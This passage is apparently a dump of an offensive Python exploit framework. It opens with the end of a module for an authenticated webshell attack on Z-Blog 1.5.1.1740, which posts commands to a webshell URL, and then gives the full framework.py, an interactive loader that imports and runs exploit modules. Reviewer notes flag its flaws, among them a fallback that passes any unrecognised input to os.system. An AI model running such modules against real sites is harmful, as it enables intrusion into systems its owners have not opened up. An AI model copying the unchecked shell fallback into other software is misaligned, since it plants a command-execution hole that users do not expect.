Log.Log.success(self.session.post(self.webshell_url, data=data).content) 168 | except Exception 
as e: 169 | Log.Log.error(str(e)) 170 | return False 171 | 172 | def show_info(self): 173 | ''' 174 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 175 | 该函数在模块被加载的时候自动调用 176 | 需要将其中的信息修改为对应的模块信息 177 | ''' 178 | Log.Log.info("Name: Zblog(1.5.1.1740) Authenticated GetShell") 179 | Log.Log.info("Effected Version: <=1.5.1.1740") 180 | Log.Log.info("Author: Shutdown_r") 181 | Log.Log.info("Home: http://www.jianshu.com/u/0876d51c215f") 182 | Log.Log.info("Refer:") 183 | Log.Log.info("\thttps://gist.github.com/WangYihang/318020687b7e5f1efb38e9afd40c941b") 184 | 185 | def main(): 186 | ''' 187 | 测试用例 188 | ''' 189 | exploit = Exploit() 190 | exploit.show_info() 191 | exploit.set_config("remote_host", "192.168.187.1") 192 | exploit.set_config("plug_prefix", "hack") 193 | exploit.show_options() 194 | exploit.exploit() 195 | 196 | if __name__ == "__main__": 197 | main() 198 | -------------------------------------------------------------------------------- /framework.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | from core.banner import banner 5 | from core.log import Log 6 | from core.log import color 7 | 8 | import sys 9 | import string 10 | import os 11 | import hashlib 12 | import readline 13 | import code 14 | import atexit 15 | import json 16 | import time 17 | import signal 18 | import importlib 19 | 20 | def setup(): 21 | history_file = "./.history" 22 | if not os.path.exists(history_file): 23 | open(history_file, 'a+').close() 24 | 25 | readline.read_history_file(history_file) 26 | readline.set_history_length(history_length) 27 | atexit.register(readline.write_history_file, history_file) 28 | 29 | readline.parse_and_bind('set enable-keypad on') 30 | 31 | readline.set_completer(complete) 32 | readline.set_completer_delims(' \t\n;') 33 | readline.parse_and_bind("tab: complete") 34 | 35 | def md5(content): 36 | return hashlib.md5(content).hexdigest() 37 | 38 | def show_help(): 39 | 
print("Usage : ")
    print(" python %s" % (sys.argv[0]))
    print("Author : ")
    print(" WangYihang ")
    print("Github : ")
    print(" https://github.com/wangyihang/exploit-framework")

def core_commands():
    '''Print the table of top-level commands available in every context.'''
    print("Core Commands")
    print("=============")
    print("\tCommand\tDescription")
    print("\t-------\t-----------")
    print("\thelp\tshow help")
    print("\tversion\tshow version")
    print("\tuse\tSelects a module by name")
    print("\tshow\tDisplays modules of a given type, or all modules")
    print("\tsearch\tSearches module names and descriptions")
    print("\tback\tMove back from the current context")
    print("\tquit\tquit")
    print("")

def module_command():
    '''Print the table of commands available once a module is loaded.'''
    print("Module Commands")
    print("=============")
    print("\tCommand\tDescription")
    print("\t-------\t-----------")
    print("\toptions\tDisplays global options or for one or more modules")
    print("\tinfo\tDisplays information about one or more modules")
    print("")

def main_help():
    '''Print both command tables (core and module).'''
    core_commands()
    module_command()

def signal_handler(ignum, frame):
    '''
    Handler installed for SIGINT and SIGTERM in ``main()``.
    It only prints a hint; it does not stop the program, so Ctrl-C does not
    leave the command loop.
    '''
    print("")
    Log.Log.info("Enter : 'q|quit|exit' to shutdown the program!")

def reset_context():
    '''Prompt label used when no module is loaded.'''
    return "Framework"

def main():
    '''
    Interactive command loop of the framework.

    Reads commands from stdin until ``q``/``quit``/``exit``. ``use <module>``
    enters a nested loop bound to that module until ``back``/``quit``.
    '''
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)
    banner.banner()

    # Always True in this file; see the fall-through branch at the bottom of the loop.
    LOCAL_COMMAND_FLAG = True

    CONTEXT = reset_context()
    while True:
        # Empty input defaults to "help".
        command = (input("[%s]=> " % (color.red(CONTEXT))) or "help")
        if command == "h" or command == "help" or command == "?":
            main_help()
        elif command == "version":
            Log.Log.info("Version: 0.0.1")
        elif command == "show":
            print("%s" % (color.purple("------\t\t------")))
            print("%s" % (color.purple("Vendor\t\tModule")))
            print("%s" % (color.purple("------\t\t------")))
            # Module listing is derived from the directory tree under ./exploit/,
            # relative to the current working directory.
            exploit_path = "./exploit/"
            vendors = os.listdir(exploit_path)
            for vendor in vendors:
                full_path = exploit_path + vendor
                if os.path.isdir(full_path):
                    # Log.Log.info("%s" % ("-" * 0x20))
                    # Log.Log.info("Vendor: %s" % (vendor))
                    exploit_files = os.listdir(full_path)
                    # ``number`` is counted but only used by the commented-out log below.
                    number = 0
                    for exploit_file in exploit_files:
                        if exploit_file.endswith(".py") and exploit_file != "__init__.py":
                            # Log.Log.info("%s => exploit.%s.%s" % (exploit_file, vendor, exploit_file.replace(".py", "")))
                            # Column alignment only: long vendor names get one tab, short ones two.
                            if len(vendor) > 8:
                                print("%s" % (color.cyan("%s\t%s" % (vendor, exploit_file.replace(".py", "")))))
                            else:
                                print("%s" % (color.cyan("%s\t\t%s" % (vendor, exploit_file.replace(".py", "")))))
                            number += 1
                    # Log.Log.info("%d exploits" % (number))
            print("%s" % (color.purple("---------")))
            print("%s" % (color.purple(" Example")))
            print("%s" % (color.purple("---------")))
            # NOTE(review): ``vendor`` and ``exploit_file`` here are whatever the
            # loops above left behind; with an empty ./exploit/ tree this raises NameError.
            print("%s" % (color.cyan("use exploit.%s.%s" % (vendor, exploit_file.replace(".py", "")))))
        elif command.startswith("use "):
            module_name = command.split(" ")[1]
            Log.Log.info("Loading module: %s" % (module_name))
            # NOTE(review): imports whatever dotted name the user typed; nothing
            # restricts it to the exploit package.
            try:
                module = importlib.import_module(module_name)
            except Exception as e:
                Log.Log.error(str(e))
                continue
            CONTEXT = module_name
            # NOTE(review): a module without an ``Exploit`` class raises
            # AttributeError here, outside the try above.
            exploit = module.Exploit()
            exploit.show_info()
            Log.Log.info("%s" % ("-" * 0x40))
            exploit.show_options()
            while True:
                # NOTE(review): this local shadows the module-level function
                # module_command(); main_help() is unaffected because it
                # resolves the global name.
                module_command = (input("[%s]=> " % (color.red(CONTEXT))) or "help")
                if module_command == "help":
                    main_help()
                    continue
                if module_command.startswith("set "):
                    # Exactly "set KEY VALUE"; values containing spaces are rejected.
                    if len(module_command.split(" ")) == 3:
                        key = module_command.split(" ")[1]
                        value = module_command.split(" ")[2]
                        exploit.set_config(key, value)
                    else:
                        Log.Log.error("Check your input!")
                        Log.Log.info("Example: \n\tset [KEY] [VALUE]")
                elif module_command == "options":
                    exploit.show_options()
                elif module_command == "info":
                    exploit.show_info()
                elif module_command == "exploit":
                    try:
                        exploit.exploit()
                    except Exception as e:
                        Log.Log.error(str(e))
                elif module_command == "quit" or module_command == "q" or module_command == "exit" or module_command == "back":
                    break
                else:
                    main_help()
            CONTEXT = reset_context()
        elif command == "q" or command == "quit" or command == "exit":
            Log.Log.info("Quiting...")
            break
        else:
            Log.Log.error("Unsupported function!")
            # NOTE(review): every unrecognised input line is handed verbatim to
            # the local shell while LOCAL_COMMAND_FLAG is True (it always is in
            # this file), so a mistyped command is executed rather than rejected.
            if LOCAL_COMMAND_FLAG == True:
                Log.Log.info("Executing command on localhost...")
                os.system(command)

if __name__ == "__main__":
    main()
# --------------------------------------------------------------------------------